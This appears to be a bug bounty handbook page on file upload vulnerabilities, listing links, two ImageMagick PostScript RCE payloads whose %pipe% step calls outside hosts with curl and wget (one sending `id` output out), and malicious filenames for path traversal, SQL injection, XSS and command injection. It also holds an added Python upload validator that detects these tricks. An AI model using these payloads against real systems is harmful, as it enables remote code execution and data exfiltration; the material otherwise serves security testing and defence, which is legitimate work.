Bug Hunter Handbook
File Upload

Last updated 3 years ago

Blogs / Articles:

Writeups:

Tools:

Cheatsheets:

Payloads:

ImageMagick RCE:

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl${IFS}zero-way.net/cc`id`) currentdevice 
putdeviceprops

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%wget http://https://helloworld.free.beeceptor.com) currentdevice 
putdeviceprops

Tweets:

Chaining file uploads with other vulns:

Set filename to:

> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.domain)>.jpg/png for XSS
> ; sleep 10; for command injections

Bug: XSS through file upload.

Payload: */alert(1)</script><script>/*
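As an added defensive example (not from the handbook or any of the linked projects), the following Python function shows how a server-side upload handler can reject the filename tricks listed above and the PostScript content that ImageMagick would hand to Ghostscript; the extension allowlist, the filename regex and the marker list are my assumptions and should be tuned per application.

```python
import re

# Allowed image extensions mapped to the magic bytes a genuine file of that type starts with.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# One base name, one dot, one extension: rules out '..', '/', spaces, quotes, '<', ';' and friends.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$")
# Content markers (assumed list): PostScript headers and the %pipe% delegate used in the
# ImageMagick payloads above, plus HTML/JS tags that turn an "image" into an XSS polyglot.
CONTENT_MARKERS = (b"%!PS", b"%pipe%", b"<script", b"<svg", b"onload=")


def check_upload(filename: str, content: bytes) -> list[str]:
    """Return a list of findings for an upload; an empty list means every check passed."""
    findings = []
    if ".." in filename or "/" in filename or "\\" in filename:
        findings.append("path traversal characters in filename")
    if not SAFE_NAME.match(filename):
        findings.append("filename contains characters outside [A-Za-z0-9_-] or extra dots")
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC:
        findings.append(f"extension '{ext}' not in allowlist")
    elif not content.startswith(MAGIC[ext]):
        # Extension says image, bytes say otherwise: the classic polyglot / disguised file.
        findings.append(f"content does not start with the {ext} magic bytes")
    for marker in CONTENT_MARKERS:
        if marker in content:
            findings.append(f"suspicious marker {marker!r} in content")
    return findings


if __name__ == "__main__":
    # Constructed sample: a well-formed PNG header passes, a PostScript body in "avatar.jpg" does not.
    print(check_upload("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
    print(check_upload("avatar.jpg", b"%!PS\nuserdict /setpagedevice undef\n"))
```

Filename and magic-byte checks do not replace hardening the converter itself; for ImageMagick that means disabling the PS, EPS and PDF coders in policy.xml so Ghostscript is never invoked on user-supplied files.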

Burp Suite Extension -

https://anotherhackerblog.com/exploiting-file-uploads-pt-2/
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437
https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a
https://blog.yeswehack.com/yeswerhackers/exploitation/file-upload-attacks-part-1/
https://blog.yeswehack.com/yeswerhackers/file-upload-attacks-part-2/
https://0xn3va.gitbook.io/cheat-sheets/web-application/file-upload-vulnerabilities
https://link.medium.com/sILCWr8xB3
https://link.medium.com/V8SdaJ8xB3
https://link.medium.com/fRfag0byB3
https://link.medium.com/6qTQZwayB3
https://link.medium.com/jFGhtvbyB3
Upload Scanner
https://github.com/almandin/fuxploider
https://github.com/ptoomey3/evilarc
https://github.com/daffainfo/AllAboutBugBounty/blob/master/BypassFileUpload.md
File upload tricks and checklist
https://twitter.com/hunter0x7/status/1346397333072846848?s=20
https://twitter.com/HolyBugx/status/1348928810620743682?s=20